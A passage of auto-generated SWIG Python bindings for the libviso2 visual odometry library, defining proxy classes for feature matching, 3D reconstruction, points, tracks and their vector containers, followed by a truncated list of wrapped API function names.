"""
return _viso2.Matcher_matchFeatures(self, method, Tr_delta)
def bucketFeatures(self, max_features, bucket_width, bucket_height):
"""bucketFeatures(self, max_features, bucket_width, bucket_height)"""
return _viso2.Matcher_bucketFeatures(self, max_features, bucket_width, bucket_height)
def getMatches(self):
"""getMatches(self) -> MatchVector"""
return _viso2.Matcher_getMatches(self)
def getGain(self, inliers):
"""getGain(self, inliers) -> float"""
return _viso2.Matcher_getGain(self, inliers)
def pushBack(self, *args):
"""
pushBack(self, I1, I2, dims, replace)
pushBack(self, I1, dims, replace)
pushBack(self, image1, image2, replace=False)
pushBack(self, image1, image2)
pushBack(self, image1, replace=False)
pushBack(self, image1)
"""
return _viso2.Matcher_pushBack(self, *args)
Matcher_swigregister = _viso2.Matcher_swigregister
Matcher_swigregister(Matcher)
class Matcher_parameters(_object):
"""Proxy of C++ Matcher::parameters class."""
__swig_setmethods__ = {}
__setattr__ = lambda self, name, value: _swig_setattr(self, Matcher_parameters, name, value)
__swig_getmethods__ = {}
__getattr__ = lambda self, name: _swig_getattr(self, Matcher_parameters, name)
__repr__ = _swig_repr
__swig_setmethods__["nms_n"] = _viso2.Matcher_parameters_nms_n_set
__swig_getmethods__["nms_n"] = _viso2.Matcher_parameters_nms_n_get
if _newclass:
nms_n = _swig_property(_viso2.Matcher_parameters_nms_n_get, _viso2.Matcher_parameters_nms_n_set)
__swig_setmethods__["nms_tau"] = _viso2.Matcher_parameters_nms_tau_set
__swig_getmethods__["nms_tau"] = _viso2.Matcher_parameters_nms_tau_get
if _newclass:
nms_tau = _swig_property(_viso2.Matcher_parameters_nms_tau_get, _viso2.Matcher_parameters_nms_tau_set)
__swig_setmethods__["match_binsize"] = _viso2.Matcher_parameters_match_binsize_set
__swig_getmethods__["match_binsize"] = _viso2.Matcher_parameters_match_binsize_get
if _newclass:
match_binsize = _swig_property(_viso2.Matcher_parameters_match_binsize_get, _viso2.Matcher_parameters_match_binsize_set)
__swig_setmethods__["match_radius"] = _viso2.Matcher_parameters_match_radius_set
__swig_getmethods__["match_radius"] = _viso2.Matcher_parameters_match_radius_get
if _newclass:
match_radius = _swig_property(_viso2.Matcher_parameters_match_radius_get, _viso2.Matcher_parameters_match_radius_set)
__swig_setmethods__["match_disp_tolerance"] = _viso2.Matcher_parameters_match_disp_tolerance_set
__swig_getmethods__["match_disp_tolerance"] = _viso2.Matcher_parameters_match_disp_tolerance_get
if _newclass:
match_disp_tolerance = _swig_property(_viso2.Matcher_parameters_match_disp_tolerance_get, _viso2.Matcher_parameters_match_disp_tolerance_set)
__swig_setmethods__["outlier_disp_tolerance"] = _viso2.Matcher_parameters_outlier_disp_tolerance_set
__swig_getmethods__["outlier_disp_tolerance"] = _viso2.Matcher_parameters_outlier_disp_tolerance_get
if _newclass:
outlier_disp_tolerance = _swig_property(_viso2.Matcher_parameters_outlier_disp_tolerance_get, _viso2.Matcher_parameters_outlier_disp_tolerance_set)
__swig_setmethods__["outlier_flow_tolerance"] = _viso2.Matcher_parameters_outlier_flow_tolerance_set
__swig_getmethods__["outlier_flow_tolerance"] = _viso2.Matcher_parameters_outlier_flow_tolerance_get
if _newclass:
outlier_flow_tolerance = _swig_property(_viso2.Matcher_parameters_outlier_flow_tolerance_get, _viso2.Matcher_parameters_outlier_flow_tolerance_set)
__swig_setmethods__["multi_stage"] = _viso2.Matcher_parameters_multi_stage_set
__swig_getmethods__["multi_stage"] = _viso2.Matcher_parameters_multi_stage_get
if _newclass:
multi_stage = _swig_property(_viso2.Matcher_parameters_multi_stage_get, _viso2.Matcher_parameters_multi_stage_set)
__swig_setmethods__["half_resolution"] = _viso2.Matcher_parameters_half_resolution_set
__swig_getmethods__["half_resolution"] = _viso2.Matcher_parameters_half_resolution_get
if _newclass:
half_resolution = _swig_property(_viso2.Matcher_parameters_half_resolution_get, _viso2.Matcher_parameters_half_resolution_set)
__swig_setmethods__["refinement"] = _viso2.Matcher_parameters_refinement_set
__swig_getmethods__["refinement"] = _viso2.Matcher_parameters_refinement_get
if _newclass:
refinement = _swig_property(_viso2.Matcher_parameters_refinement_get, _viso2.Matcher_parameters_refinement_set)
__swig_setmethods__["f"] = _viso2.Matcher_parameters_f_set
__swig_getmethods__["f"] = _viso2.Matcher_parameters_f_get
if _newclass:
f = _swig_property(_viso2.Matcher_parameters_f_get, _viso2.Matcher_parameters_f_set)
__swig_setmethods__["cu"] = _viso2.Matcher_parameters_cu_set
__swig_getmethods__["cu"] = _viso2.Matcher_parameters_cu_get
if _newclass:
cu = _swig_property(_viso2.Matcher_parameters_cu_get, _viso2.Matcher_parameters_cu_set)
__swig_setmethods__["cv"] = _viso2.Matcher_parameters_cv_set
__swig_getmethods__["cv"] = _viso2.Matcher_parameters_cv_get
if _newclass:
cv = _swig_property(_viso2.Matcher_parameters_cv_get, _viso2.Matcher_parameters_cv_set)
__swig_setmethods__["base"] = _viso2.Matcher_parameters_base_set
__swig_getmethods__["base"] = _viso2.Matcher_parameters_base_get
if _newclass:
base = _swig_property(_viso2.Matcher_parameters_base_get, _viso2.Matcher_parameters_base_set)
def __init__(self):
"""__init__(self) -> Matcher_parameters"""
this = _viso2.new_Matcher_parameters()
try:
self.this.append(this)
except __builtin__.Exception:
self.this = this
__swig_destroy__ = _viso2.delete_Matcher_parameters
__del__ = lambda self: None
Matcher_parameters_swigregister = _viso2.Matcher_parameters_swigregister
Matcher_parameters_swigregister(Matcher_parameters)
class p_match(_object):
"""Proxy of C++ Matcher::p_match class."""
__swig_setmethods__ = {}
__setattr__ = lambda self, name, value: _swig_setattr(self, p_match, name, value)
__swig_getmethods__ = {}
__getattr__ = lambda self, name: _swig_getattr(self, p_match, name)
__repr__ = _swig_repr
__swig_setmethods__["u1p"] = _viso2.p_match_u1p_set
__swig_getmethods__["u1p"] = _viso2.p_match_u1p_get
if _newclass:
u1p = _swig_property(_viso2.p_match_u1p_get, _viso2.p_match_u1p_set)
__swig_setmethods__["v1p"] = _viso2.p_match_v1p_set
__swig_getmethods__["v1p"] = _viso2.p_match_v1p_get
if _newclass:
v1p = _swig_property(_viso2.p_match_v1p_get, _viso2.p_match_v1p_set)
__swig_setmethods__["i1p"] = _viso2.p_match_i1p_set
__swig_getmethods__["i1p"] = _viso2.p_match_i1p_get
if _newclass:
i1p = _swig_property(_viso2.p_match_i1p_get, _viso2.p_match_i1p_set)
__swig_setmethods__["u2p"] = _viso2.p_match_u2p_set
__swig_getmethods__["u2p"] = _viso2.p_match_u2p_get
if _newclass:
u2p = _swig_property(_viso2.p_match_u2p_get, _viso2.p_match_u2p_set)
__swig_setmethods__["v2p"] = _viso2.p_match_v2p_set
__swig_getmethods__["v2p"] = _viso2.p_match_v2p_get
if _newclass:
v2p = _swig_property(_viso2.p_match_v2p_get, _viso2.p_match_v2p_set)
__swig_setmethods__["i2p"] = _viso2.p_match_i2p_set
__swig_getmethods__["i2p"] = _viso2.p_match_i2p_get
if _newclass:
i2p = _swig_property(_viso2.p_match_i2p_get, _viso2.p_match_i2p_set)
__swig_setmethods__["u1c"] = _viso2.p_match_u1c_set
__swig_getmethods__["u1c"] = _viso2.p_match_u1c_get
if _newclass:
u1c = _swig_property(_viso2.p_match_u1c_get, _viso2.p_match_u1c_set)
__swig_setmethods__["v1c"] = _viso2.p_match_v1c_set
__swig_getmethods__["v1c"] = _viso2.p_match_v1c_get
if _newclass:
v1c = _swig_property(_viso2.p_match_v1c_get, _viso2.p_match_v1c_set)
__swig_setmethods__["i1c"] = _viso2.p_match_i1c_set
__swig_getmethods__["i1c"] = _viso2.p_match_i1c_get
if _newclass:
i1c = _swig_property(_viso2.p_match_i1c_get, _viso2.p_match_i1c_set)
__swig_setmethods__["u2c"] = _viso2.p_match_u2c_set
__swig_getmethods__["u2c"] = _viso2.p_match_u2c_get
if _newclass:
u2c = _swig_property(_viso2.p_match_u2c_get, _viso2.p_match_u2c_set)
__swig_setmethods__["v2c"] = _viso2.p_match_v2c_set
__swig_getmethods__["v2c"] = _viso2.p_match_v2c_get
if _newclass:
v2c = _swig_property(_viso2.p_match_v2c_get, _viso2.p_match_v2c_set)
__swig_setmethods__["i2c"] = _viso2.p_match_i2c_set
__swig_getmethods__["i2c"] = _viso2.p_match_i2c_get
if _newclass:
i2c = _swig_property(_viso2.p_match_i2c_get, _viso2.p_match_i2c_set)
def __init__(self, *args):
"""
__init__(self) -> p_match
__init__(self, u1p, v1p, i1p, u2p, v2p, i2p, u1c, v1c, i1c, u2c, v2c, i2c) -> p_match
"""
this = _viso2.new_p_match(*args)
try:
self.this.append(this)
except __builtin__.Exception:
self.this = this
__swig_destroy__ = _viso2.delete_p_match
__del__ = lambda self: None
p_match_swigregister = _viso2.p_match_swigregister
p_match_swigregister(p_match)
class Reconstruction(_object):
"""Proxy of C++ Reconstruction class."""
__swig_setmethods__ = {}
__setattr__ = lambda self, name, value: _swig_setattr(self, Reconstruction, name, value)
__swig_getmethods__ = {}
__getattr__ = lambda self, name: _swig_getattr(self, Reconstruction, name)
__repr__ = _swig_repr
def __init__(self):
"""__init__(self) -> Reconstruction"""
this = _viso2.new_Reconstruction()
try:
self.this.append(this)
except __builtin__.Exception:
self.this = this
__swig_destroy__ = _viso2.delete_Reconstruction
__del__ = lambda self: None
def setCalibration(self, f, cu, cv):
"""setCalibration(self, f, cu, cv)"""
return _viso2.Reconstruction_setCalibration(self, f, cu, cv)
def update(self, p_matched, Tr, point_type=1, min_track_length=2, max_dist=30, min_angle=2):
"""
update(self, p_matched, Tr, point_type=1, min_track_length=2, max_dist=30, min_angle=2)
update(self, p_matched, Tr, point_type=1, min_track_length=2, max_dist=30)
update(self, p_matched, Tr, point_type=1, min_track_length=2)
update(self, p_matched, Tr, point_type=1)
update(self, p_matched, Tr)
"""
return _viso2.Reconstruction_update(self, p_matched, Tr, point_type, min_track_length, max_dist, min_angle)
def getPoints(self):
"""getPoints(self) -> Point3dVector"""
return _viso2.Reconstruction_getPoints(self)
def getTracks(self):
"""getTracks(self) -> TrackVector"""
return _viso2.Reconstruction_getTracks(self)
Reconstruction_swigregister = _viso2.Reconstruction_swigregister
Reconstruction_swigregister(Reconstruction)
class point3d(_object):
"""Proxy of C++ Reconstruction::point3d class."""
__swig_setmethods__ = {}
__setattr__ = lambda self, name, value: _swig_setattr(self, point3d, name, value)
__swig_getmethods__ = {}
__getattr__ = lambda self, name: _swig_getattr(self, point3d, name)
__repr__ = _swig_repr
__swig_setmethods__["x"] = _viso2.point3d_x_set
__swig_getmethods__["x"] = _viso2.point3d_x_get
if _newclass:
x = _swig_property(_viso2.point3d_x_get, _viso2.point3d_x_set)
__swig_setmethods__["y"] = _viso2.point3d_y_set
__swig_getmethods__["y"] = _viso2.point3d_y_get
if _newclass:
y = _swig_property(_viso2.point3d_y_get, _viso2.point3d_y_set)
__swig_setmethods__["z"] = _viso2.point3d_z_set
__swig_getmethods__["z"] = _viso2.point3d_z_get
if _newclass:
z = _swig_property(_viso2.point3d_z_get, _viso2.point3d_z_set)
def __init__(self, *args):
"""
__init__(self) -> point3d
__init__(self, x, y, z) -> point3d
"""
this = _viso2.new_point3d(*args)
try:
self.this.append(this)
except __builtin__.Exception:
self.this = this
__swig_destroy__ = _viso2.delete_point3d
__del__ = lambda self: None
point3d_swigregister = _viso2.point3d_swigregister
point3d_swigregister(point3d)
class point2d(_object):
"""Proxy of C++ Reconstruction::point2d class."""
__swig_setmethods__ = {}
__setattr__ = lambda self, name, value: _swig_setattr(self, point2d, name, value)
__swig_getmethods__ = {}
__getattr__ = lambda self, name: _swig_getattr(self, point2d, name)
__repr__ = _swig_repr
__swig_setmethods__["u"] = _viso2.point2d_u_set
__swig_getmethods__["u"] = _viso2.point2d_u_get
if _newclass:
u = _swig_property(_viso2.point2d_u_get, _viso2.point2d_u_set)
__swig_setmethods__["v"] = _viso2.point2d_v_set
__swig_getmethods__["v"] = _viso2.point2d_v_get
if _newclass:
v = _swig_property(_viso2.point2d_v_get, _viso2.point2d_v_set)
def __init__(self, *args):
"""
__init__(self) -> point2d
__init__(self, u, v) -> point2d
"""
this = _viso2.new_point2d(*args)
try:
self.this.append(this)
except __builtin__.Exception:
self.this = this
__swig_destroy__ = _viso2.delete_point2d
__del__ = lambda self: None
point2d_swigregister = _viso2.point2d_swigregister
point2d_swigregister(point2d)
class track(_object):
"""Proxy of C++ Reconstruction::track class."""
__swig_setmethods__ = {}
__setattr__ = lambda self, name, value: _swig_setattr(self, track, name, value)
__swig_getmethods__ = {}
__getattr__ = lambda self, name: _swig_getattr(self, track, name)
__repr__ = _swig_repr
__swig_setmethods__["pixels"] = _viso2.track_pixels_set
__swig_getmethods__["pixels"] = _viso2.track_pixels_get
if _newclass:
pixels = _swig_property(_viso2.track_pixels_get, _viso2.track_pixels_set)
__swig_setmethods__["pt"] = _viso2.track_pt_set
__swig_getmethods__["pt"] = _viso2.track_pt_get
if _newclass:
pt = _swig_property(_viso2.track_pt_get, _viso2.track_pt_set)
__swig_setmethods__["valid"] = _viso2.track_valid_set
__swig_getmethods__["valid"] = _viso2.track_valid_get
if _newclass:
valid = _swig_property(_viso2.track_valid_get, _viso2.track_valid_set)
__swig_setmethods__["first_frame"] = _viso2.track_first_frame_set
__swig_getmethods__["first_frame"] = _viso2.track_first_frame_get
if _newclass:
first_frame = _swig_property(_viso2.track_first_frame_get, _viso2.track_first_frame_set)
__swig_setmethods__["last_frame"] = _viso2.track_last_frame_set
__swig_getmethods__["last_frame"] = _viso2.track_last_frame_get
if _newclass:
last_frame = _swig_property(_viso2.track_last_frame_get, _viso2.track_last_frame_set)
__swig_setmethods__["last_idx"] = _viso2.track_last_idx_set
__swig_getmethods__["last_idx"] = _viso2.track_last_idx_get
if _newclass:
last_idx = _swig_property(_viso2.track_last_idx_get, _viso2.track_last_idx_set)
def __init__(self):
"""__init__(self) -> track"""
this = _viso2.new_track()
try:
self.this.append(this)
except __builtin__.Exception:
self.this = this
__swig_destroy__ = _viso2.delete_track
__del__ = lambda self: None
track_swigregister = _viso2.track_swigregister
track_swigregister(track)
class MatchVector(_object):
"""Proxy of C++ std::vector<(Matcher::p_match)> class."""
__swig_setmethods__ = {}
__setattr__ = lambda self, name, value: _swig_setattr(self, MatchVector, name, value)
__swig_getmethods__ = {}
__getattr__ = lambda self, name: _swig_getattr(self, MatchVector, name)
__repr__ = _swig_repr
def iterator(self):
"""iterator(self) -> SwigPyIterator"""
return _viso2.MatchVector_iterator(self)
def __iter__(self):
return self.iterator()
def __nonzero__(self):
"""__nonzero__(self) -> bool"""
return _viso2.MatchVector___nonzero__(self)
def __bool__(self):
"""__bool__(self) -> bool"""
return _viso2.MatchVector___bool__(self)
def __len__(self):
"""__len__(self) -> std::vector< Matcher::p_match >::size_type"""
return _viso2.MatchVector___len__(self)
def __getslice__(self, i, j):
"""__getslice__(self, i, j) -> MatchVector"""
return _viso2.MatchVector___getslice__(self, i, j)
def __setslice__(self, *args):
"""
__setslice__(self, i, j)
__setslice__(self, i, j, v)
"""
return _viso2.MatchVector___setslice__(self, *args)
def __delslice__(self, i, j):
"""__delslice__(self, i, j)"""
return _viso2.MatchVector___delslice__(self, i, j)
def __delitem__(self, *args):
"""
__delitem__(self, i)
__delitem__(self, slice)
"""
return _viso2.MatchVector___delitem__(self, *args)
def __getitem__(self, *args):
"""
__getitem__(self, slice) -> MatchVector
__getitem__(self, i) -> p_match
"""
return _viso2.MatchVector___getitem__(self, *args)
def __setitem__(self, *args):
"""
__setitem__(self, slice, v)
__setitem__(self, slice)
__setitem__(self, i, x)
"""
return _viso2.MatchVector___setitem__(self, *args)
def pop(self):
"""pop(self) -> p_match"""
return _viso2.MatchVector_pop(self)
def append(self, x):
"""append(self, x)"""
return _viso2.MatchVector_append(self, x)
def empty(self):
"""empty(self) -> bool"""
return _viso2.MatchVector_empty(self)
def size(self):
"""size(self) -> std::vector< Matcher::p_match >::size_type"""
return _viso2.MatchVector_size(self)
def swap(self, v):
"""swap(self, v)"""
return _viso2.MatchVector_swap(self, v)
def begin(self):
"""begin(self) -> std::vector< Matcher::p_match >::iterator"""
return _viso2.MatchVector_begin(self)
def end(self):
"""end(self) -> std::vector< Matcher::p_match >::iterator"""
return _viso2.MatchVector_end(self)
def rbegin(self):
"""rbegin(self) -> std::vector< Matcher::p_match >::reverse_iterator"""
return _viso2.MatchVector_rbegin(self)
def rend(self):
"""rend(self) -> std::vector< Matcher::p_match >::reverse_iterator"""
return _viso2.MatchVector_rend(self)
def clear(self):
"""clear(self)"""
return _viso2.MatchVector_clear(self)
def get_allocator(self):
"""get_allocator(self) -> std::vector< Matcher::p_match >::allocator_type"""
return _viso2.MatchVector_get_allocator(self)
def pop_back(self):
"""pop_back(self)"""
return _viso2.MatchVector_pop_back(self)
def erase(self, *args):
"""
erase(self, pos) -> std::vector< Matcher::p_match >::iterator
erase(self, first, last) -> std::vector< Matcher::p_match >::iterator
"""
return _viso2.MatchVector_erase(self, *args)
def __init__(self, *args):
"""
__init__(self) -> MatchVector
__init__(self, arg2) -> MatchVector
__init__(self, size) -> MatchVector
__init__(self, size, value) -> MatchVector
"""
this = _viso2.new_MatchVector(*args)
try:
self.this.append(this)
except __builtin__.Exception:
self.this = this
def push_back(self, x):
"""push_back(self, x)"""
return _viso2.MatchVector_push_back(self, x)
def front(self):
"""front(self) -> p_match"""
return _viso2.MatchVector_front(self)
def back(self):
"""back(self) -> p_match"""
return _viso2.MatchVector_back(self)
def assign(self, n, x):
"""assign(self, n, x)"""
return _viso2.MatchVector_assign(self, n, x)
def resize(self, *args):
"""
resize(self, new_size)
resize(self, new_size, x)
"""
return _viso2.MatchVector_resize(self, *args)
def insert(self, *args):
"""
insert(self, pos, x) -> std::vector< Matcher::p_match >::iterator
insert(self, pos, n, x)
"""
return _viso2.MatchVector_insert(self, *args)
def reserve(self, n):
"""reserve(self, n)"""
return _viso2.MatchVector_reserve(self, n)
def capacity(self):
"""capacity(self) -> std::vector< Matcher::p_match >::size_type"""
return _viso2.MatchVector_capacity(self)
__swig_destroy__ = _viso2.delete_MatchVector
__del__ = lambda self: None
MatchVector_swigregister = _viso2.MatchVector_swigregister
MatchVector_swigregister(MatchVector)
class Point3dVector(_object):
"""Proxy of C++ std::vector<(Reconstruction::point3d)> class."""
__swig_setmethods__ = {}
__setattr__ = lambda self, name, value: _swig_setattr(self, Point3dVector, name, value)
__swig_getmethods__ = {}
__getattr__ = lambda self, name: _swig_getattr(self, Point3dVector, name)
__repr__ = _swig_repr
def iterator(self):
"""iterator(self) -> SwigPyIterator"""
return _viso2.Point3dVector_iterator(self)
def __iter__(self):
return self.iterator()
def __nonzero__(self):
"""__nonzero__(self) -> bool"""
return _viso2.Point3dVector___nonzero__(self)
def __bool__(self):
"""__bool__(self) -> bool"""
return _viso2.Point3dVector___bool__(self)
def __len__(self):
"""__len__(self) -> std::vector< Reconstruction::point3d >::size_type"""
return _viso2.Point3dVector___len__(self)
def __getslice__(self, i, j):
"""__getslice__(self, i, j) -> Point3dVector"""
return _viso2.Point3dVector___getslice__(self, i, j)
def __setslice__(self, *args):
"""
__setslice__(self, i, j)
__setslice__(self, i, j, v)
"""
return _viso2.Point3dVector___setslice__(self, *args)
def __delslice__(self, i, j):
"""__delslice__(self, i, j)"""
return _viso2.Point3dVector___delslice__(self, i, j)
def __delitem__(self, *args):
"""
__delitem__(self, i)
__delitem__(self, slice)
"""
return _viso2.Point3dVector___delitem__(self, *args)
def __getitem__(self, *args):
"""
__getitem__(self, slice) -> Point3dVector
__getitem__(self, i) -> point3d
"""
return _viso2.Point3dVector___getitem__(self, *args)
def __setitem__(self, *args):
"""
__setitem__(self, slice, v)
__setitem__(self, slice)
__setitem__(self, i, x)
"""
return _viso2.Point3dVector___setitem__(self, *args)
def pop(self):
"""pop(self) -> point3d"""
return _viso2.Point3dVector_pop(self)
def append(self, x):
"""append(self, x)"""
return _viso2.Point3dVector_append(self, x)
def empty(self):
"""empty(self) -> bool"""
return _viso2.Point3dVector_empty(self)
def size(self):
"""size(self) -> std::vector< Reconstruction::point3d >::size_type"""
return _viso2.Point3dVector_size(self)
def swap(self, v):
"""swap(self, v)"""
return _viso2.Point3dVector_swap(self, v)
def begin(self):
"""begin(self) -> std::vector< Reconstruction::point3d >::iterator"""
return _viso2.Point3dVector_begin(self)
def end(self):
"""end(self) -> std::vector< Reconstruction::point3d >::iterator"""
return _viso2.Point3dVector_end(self)
def rbegin(self):
"""rbegin(self) -> std::vector< Reconstruction::point3d >::reverse_iterator"""
return _viso2.Point3dVector_rbegin(self)
def rend(self):
"""rend(self) -> std::vector< Reconstruction::point3d >::reverse_iterator"""
return _viso2.Point3dVector_rend(self)
def clear(self):
"""clear(self)"""
return _viso2.Point3dVector_clear(self)
def get_allocator(self):
"""get_allocator(self) -> std::vector< Reconstruction::point3d >::allocator_type"""
return _viso2.Point3dVector_get_allocator(self)
def pop_back(self):
"""pop_back(self)"""
return _viso2.Point3dVector_pop_back(self)
def erase(self, *args):
"""
erase(self, pos) -> std::vector< Reconstruction::point3d >::iterator
erase(self, first, last) -> std::vector< Reconstruction::point3d >::iterator
"""
return _viso2.Point3dVector_erase(self, *args)
def __init__(self, *args):
"""
__init__(self) -> Point3dVector
__init__(self, arg2) -> Point3dVector
__init__(self, size) -> Point3dVector
__init__(self, size, value) -> Point3dVector
"""
this = _viso2.new_Point3dVector(*args)
try:
self.this.append(this)
except __builtin__.Exception:
self.this = this
def push_back(self, x):
"""push_back(self, x)"""
return _viso2.Point3dVector_push_back(self, x)
def front(self):
"""front(self) -> point3d"""
return _viso2.Point3dVector_front(self)
def back(self):
"""back(self) -> point3d"""
return _viso2.Point3dVector_back(self)
def assign(self, n, x):
"""assign(self, n, x)"""
return _viso2.Point3dVector_assign(self, n, x)
def resize(self, *args):
"""
resize(self, new_size)
resize(self, new_size, x)
"""
return _viso2.Point3dVector_resize(self, *args)
def insert(self, *args):
"""
insert(self, pos, x) -> std::vector< Reconstruction::point3d >::iterator
insert(self, pos, n, x)
"""
return _viso2.Point3dVector_insert(self, *args)
def reserve(self, n):
"""reserve(self, n)"""
return _viso2.Point3dVector_reserve(self, n)
def capacity(self):
"""capacity(self) -> std::vector< Reconstruction::point3d >::size_type"""
return _viso2.Point3dVector_capacity(self)
__swig_destroy__ = _viso2.delete_Point3dVector
__del__ = lambda self: None
Point3dVector_swigregister = _viso2.Point3dVector_swigregister
Point3dVector_swigregister(Point3dVector)
class TrackVector(_object):
"""Proxy of C++ std::vector<(Reconstruction::track)> class."""
__swig_setmethods__ = {}
__setattr__ = lambda self, name, value: _swig_setattr(self, TrackVector, name, value)
__swig_getmethods__ = {}
__getattr__ = lambda self, name: _swig_getattr(self, TrackVector, name)
__repr__ = _swig_repr
def iterator(self):
"""iterator(self) -> SwigPyIterator"""
return _viso2.TrackVector_iterator(self)
def __iter__(self):
return self.iterator()
def __nonzero__(self):
"""__nonzero__(self) -> bool"""
return _viso2.TrackVector___nonzero__(self)
def __bool__(self):
"""__bool__(self) -> bool"""
return _viso2.TrackVector___bool__(self)
def __len__(self):
"""__len__(self) -> std::vector< Reconstruction::track >::size_type"""
return _viso2.TrackVector___len__(self)
def __getslice__(self, i, j):
"""__getslice__(self, i, j) -> TrackVector"""
return _viso2.TrackVector___getslice__(self, i, j)
def __setslice__(self, *args):
"""
__setslice__(self, i, j)
__setslice__(self, i, j, v)
"""
return _viso2.TrackVector___setslice__(self, *args)
def __delslice__(self, i, j):
"""__delslice__(self, i, j)"""
return _viso2.TrackVector___delslice__(self, i, j)
def __delitem__(self, *args):
"""
__delitem__(self, i)
__delitem__(self, slice)
"""
return _viso2.TrackVector___delitem__(self, *args)
def __getitem__(self, *args):
"""
__getitem__(self, slice) -> TrackVector
__getitem__(self, i) -> track
"""
return _viso2.TrackVector___getitem__(self, *args)
def __setitem__(self, *args):
"""
__setitem__(self, slice, v)
__setitem__(self, slice)
__setitem__(self, i, x)
"""
return _viso2.TrackVector___setitem__(self, *args)
def pop(self):
"""pop(self) -> track"""
return _viso2.TrackVector_pop(self)
def append(self, x):
"""append(self, x)"""
return _viso2.TrackVector_append(self, x)
def empty(self):
"""empty(self) -> bool"""
return _viso2.TrackVector_empty(self)
def size(self):
"""size(self) -> std::vector< Reconstruction::track >::size_type"""
return _viso2.TrackVector_size(self)
def swap(self, v):
"""swap(self, v)"""
return _viso2.TrackVector_swap(self, v)
def begin(self):
"""begin(self) -> std::vector< Reconstruction::track >::iterator"""
return _viso2.TrackVector_begin(self)
def end(self):
"""end(self) -> std::vector< Reconstruction::track >::iterator"""
return _viso2.TrackVector_end(self)
def rbegin(self):
"""rbegin(self) -> std::vector< Reconstruction::track >::reverse_iterator"""
return _viso2.TrackVector_rbegin(self)
def rend(self):
"""rend(self) -> std::vector< Reconstruction::track >::reverse_iterator"""
return _viso2.TrackVector_rend(self)
def clear(self):
"""clear(self)"""
return _viso2.TrackVector_clear(self)
def get_allocator(self):
"""get_allocator(self) -> std::vector< Reconstruction::track >::allocator_type"""
return _viso2.TrackVector_get_allocator(self)
def pop_back(self):
"""pop_back(self)"""
return _viso2.TrackVector_pop_back(self)
def erase(self, *args):
"""
erase(self, pos) -> std::vector< Reconstruction::track >::iterator
erase(self, first, last) -> std::vector< Reconstruction::track >::iterator
"""
return _viso2.TrackVector_erase(self, *args)
def __init__(self, *args):
"""
__init__(self) -> TrackVector
__init__(self, arg2) -> TrackVector
__init__(self, size) -> TrackVector
__init__(self, size, value) -> TrackVector
"""
this = _viso2.new_TrackVector(*args)
try:
self.this.append(this)
except __builtin__.Exception:
self.this = this
def push_back(self, x):
"""push_back(self, x)"""
return _viso2.TrackVector_push_back(self, x)
def front(self):
"""front(self) -> track"""
return _viso2.TrackVector_front(self)
def back(self):
"""back(self) -> track"""
return _viso2.TrackVector_back(self)
def assign(self, n, x):
"""assign(self, n, x)"""
return _viso2.TrackVector_assign(self, n, x)
def resize(self, *args):
"""
resize(self, new_size)
resize(self, new_size, x)
"""
return _viso2.TrackVector_resize(self, *args)
def insert(self, *args):
"""
insert(self, pos, x) -> std::vector< Reconstruction::track >::iterator
insert(self, pos, n, x)
"""
return _viso2.TrackVector_insert(self, *args)
def reserve(self, n):
"""reserve(self, n)"""
return _viso2.TrackVector_reserve(self, n)
def capacity(self):
"""capacity(self) -> std::vector< Reconstruction::track >::size_type"""
return _viso2.TrackVector_capacity(self)
__swig_destroy__ = _viso2.delete_TrackVector
__del__ = lambda self: None
TrackVector_swigregister = _viso2.TrackVector_swigregister
TrackVector_swigregister(TrackVector)
# This file is compatible with both classic and new-style classes.
| [
"_viso2.TrackVector_empty",
"_viso2.TrackVector_push_back",
"_viso2.TrackVector___delitem__",
"_viso2.MatchVector___getitem__",
"_viso2.MatchVector_pop_back",
"_viso2.SwigPyIterator_value",
"_viso2.Matrix_inv",
"_viso2.Point3dVector_clear",
"_viso2.new_MatchVector",
"_viso2.MatchVector_pop",
"_viso2.TrackVector___setitem__",
"_viso2.MatchVector___len__",
"_viso2.TrackVector_get_allocator",
"_viso2.VisualOdometry_getMotion",
"_viso2.new_point2d",
"_viso2.SwigPyIterator___eq__",
"_viso2.TrackVector___getslice__",
"_viso2.Matrix_svd",
"_viso2.Matrix_setMat",
"_viso2.Matrix_diag",
"_viso2.TrackVector___getitem__",
"_viso2.Point3dVector_empty",
"_viso2.VisualOdometry_getMatches",
"_viso2.new_VisualOdometryStereo",
"_viso2.SwigPyIterator_incr",
"_viso2.MatchVector_end",
"_viso2.MatchVector___setslice__",
"_viso2.TrackVector_pop",
"_viso2.Matrix_rotMatY",
"_viso2.Matrix_setVal",
"_viso2.Matcher_getMatches",
"_viso2.MatchVector___delslice__",
"_viso2.Matcher_matchFeatures",
"_viso2.Matrix_cross",
"_viso2.new_Matcher_parameters",
"_viso2.Matrix_setInverse",
"_viso2.Matrix_eye",
"_viso2.Matrix_reshape",
"_viso2.Matrix_setDiag",
"_viso2.Matrix_rotMatZ",
"_viso2.SwigPyIterator___iadd__",
"_viso2.MatchVector_swap",
"_viso2.TrackVector_iterator",
"_viso2.TrackVector_erase",
"_viso2.MatchVector_get_allocator",
"_viso2.Point3dVector___len__",
"_viso2.TrackVector_swap",
"_viso2.Matrix_det",
"_viso2.TrackVector_pop_back",
"_viso2.Point3dVector___nonzero__",
"_viso2.Matrix_toNumpy",
"_viso2.TrackVector_append",
"_viso2.VisualOdometryMono_getInlierMatches",
"_viso2.TrackVector_rbegin",
"_viso2.VisualOdometryStereo_process_frame",
"_viso2.MatchVector_assign",
"_viso2.MatchVector_capacity",
"_viso2.Point3dVector_back",
"_viso2.Point3dVector___delslice__",
"_viso2.new_VO_parameters",
"_viso2.Point3dVector_size",
"_viso2.Matrix_zero",
"_viso2.SwigPyIterator___next__",
"_viso2.Point3dVector_push_back",
"_viso2.VisualOdometry_getInlierIndices",
"_viso2.SwigPyIterator___add__",
"_viso2.Point3dVector_rend",
"_viso2.Reconstruction_getTracks",
"_viso2.TrackVector_resize",
"_viso2.VisualOdometry_getNumberOfInliers",
"_viso2.Point3dVector_capacity",
"_viso2.VisualOdometryMono_process",
"_viso2.Matrix___add__",
"importlib.import_module",
"_viso2.Matrix_identity",
"_viso2.MatchVector_push_back",
"_viso2.Matrix_assign",
"_viso2.Matrix_getMat",
"_viso2.TrackVector___setslice__",
"_viso2.Point3dVector___setitem__",
"_viso2.Matcher_setIntrinsics",
"_viso2.SwigPyIterator_copy",
"_viso2.MatchVector_size",
"_viso2.TrackVector_size",
"_viso2.Point3dVector___delitem__",
"_viso2.Point3dVector___getitem__",
"_viso2.Matrix___truediv__",
"_viso2.SwigPyIterator_equal",
"_viso2.new_track",
"_viso2.MatchVector_insert",
"_viso2.Point3dVector_rbegin",
"_viso2.Point3dVector_swap",
